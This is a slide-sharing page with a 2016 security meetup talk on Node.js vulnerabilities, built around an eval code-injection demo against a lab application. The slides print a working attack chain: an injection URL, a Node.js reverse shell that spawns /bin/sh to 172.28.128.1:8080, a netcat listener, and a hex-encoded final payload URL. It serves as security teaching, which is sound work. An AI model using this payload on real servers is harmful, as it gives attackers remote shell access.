Node JS reverse shell

madhuakula 5,192 views 23 slides Jul 16, 2016
Slide 1
Slide 1 of 23
Slide 1
1
Slide 2
2
Slide 3
3
Slide 4
4
Slide 5
5
Slide 6
6
Slide 7
7
Slide 8
8
Slide 9
9
Slide 10
10
Slide 11
11
Slide 12
12
Slide 13
13
Slide 14
14
Slide 15
15
Slide 16
16
Slide 17
17
Slide 18
18
Slide 19
19
Slide 20
20
Slide 21
21
Slide 22
22
Slide 23
23

About This Presentation

This is null/owasp/g4h bangalore meet presentation.

Size: 117.22 KB
Language: en
Added: Jul 16, 2016
Slides: 23 pages

Slide Content

NODE JS SECURITY
VULNERABILITIES

ABOUT ME
Madhu Akula -
Automation Security Ninja at
Interested in Security & DevOps
Never ending learner!
@madhuakula
Appsecco

WHAT IS NODE JS?
Node.js is an open-source, cross-platform
runtime environment for developing server-
side Web applications.
Although Node.js is not a JavaScript
framework, many of its basic modules are
written in JavaScript, and developers can
write new modules in JavaScript. The
runtime environment interprets JavaScript
using Google's V8 JavaScript engine.
wikipedia

HELLO WORLD HTTP SERVER IN
NODE JS
var http = require('http'); 
var server = http.createServer(function(req, res) { 
res.writeHead(200); 
res.end('Hello World'); 
}); 
server.listen(2000); 

WHY NODE JS SECURITY?
A lot of the application are moving to Javascript, especially
with MEAN (Mongo-Express-Angular-Node) stack.

HOW TO TEST NODE JS SECURITY?
It's similar to the normal web application security and adds
additional checks for the Javascript vulnerabilities.

DEMO TIME

REVERSE SHELL ON A NODE.JS
APPLICATION BY @WIREMASK
POC SETUP

VULNERABLE NODE JS CODE
'use strict' 
const http = require('http'); 
const url = require('url'); 
const path = require('path'); 
const animalsJSON = path.join(__dirname, 'animals.json'); 
const animals = require(animalsJSON); 
function requestHandler(req, res) { 
let urlParams = url.parse(req.url, true); 
let queryData = urlParams.query; 
res.writeHead(200, {"Content­Type": "application/json"}); 

ACCESS THE APPLICATION
http://localhost:3000/?name=do* 

IDENTIFICATION
The stringToRegexp function is evaluating user input to
create a RegExp object and use it to find elements in an
array.
return eval(prefix + output + suffix); // we control output value 

We can insert our own Javascript code in the output
variable and execute it. The stringToRegexp function
will escape some characters and the output value will be
evaluated.
http://localhost:3000/?name=["./;require('util').log('Owned');//*"] 

EXPLOIT
(function(){ 
var net = require("net"), 
cp = require("child_process"), 
sh = cp.spawn("/bin/sh", []); 
var client = new net.Socket(); 
client.connect(8080, "172.28.128.1", function(){ 

START NETCAT LISTENER
nc ­lvp 8080 

SAMPLE URL
http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"

HEX PAYLOAD CREATION USING PYTHON
>>> payload = 'nodejs reverse shell Java Script code' 
>>> payload.encode('hex') 

FINAL URL WITH PAYLOAD
http://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20766172206e6574203d207265717569726528226e657422292c206370203d207265717569726528226368696c645f70726f6365737322292c207368203d2063702e737061776e28222f62696e2f7368222c205b5d293b2076617220636c69656e74203d206e6577206e65742e536f636b657428293b20636c69656e742e636f6e6e65637428383038302c20223137322e32382e3132382e31222c2066756e6374696f6e28297b20636c69656e742e706970652873682e737464696e293b2073682e7374646f75742e7069706528636c69656e74293b2073682e7374646572722e7069706528636c69656e74293b207d293b2072657475726e202f612f3b207d2928293b', 'hex').toString());//*"

CHECK YOUR NETCAT LISTENER

CONCLUSION
It's highly recommended to avoid using the
eval function in a Javascript project. The
fix was rather simple, they started using
using the RegExp object directly.

WANT TO TRY YOUR YOURSELF?
https://github.com/appsecco/vulnerable-apps
docker run ­p 3000:3000 ­d appsecco/node­reverse­shell 

PLAYGROUND FOR NODEJS
VULNERABILITIES
DAMN VULNERABLE NODE APPLICATION
Ansible Playbook & Docker

NODE JS SECURITY REFERENCES
https://www.npmjs.com/package/helmet
https://blog.risingstack.com/node-js-security-checklist/
https://nodesecurity.io/resources
https://groups.google.com/forum/#!forum/nodejs-sec

THANK YOU
Q&A
@MADHUAKULA
Tags
security nodejs
Categories
General
Download
Download Slideshow Get the original presentation file
Quick Actions
Statistics
  • Views 5,192
  • Slides 23
  • Favorites 1
  • Age 3427 days
Related Slideshows
Pray For The Peace Of Jerusalem and You Will Prosper 22
Pray For The Peace Of Jerusalem and You Will Prosper
RodolfoMoralesMarcuc
32 views
Don_t_Waste_Your_Life_God.....powerpoint 26
Don_t_Waste_Your_Life_God.....powerpoint
chalobrido8
35 views
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf 31
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf
JaiJai148317
32 views
Fertility awareness methods for women in the society 14
Fertility awareness methods for women in the society
Isaiah47
30 views
Chapter 5 Arithmetic Functions Computer Organisation and Architecture 35
Chapter 5 Arithmetic Functions Computer Organisation and Architecture
RitikSharma297999
28 views
syakira bhasa inggris (1) (1).pptx....... 5
syakira bhasa inggris (1) (1).pptx.......
ourcommunity56
30 views
View More in This Category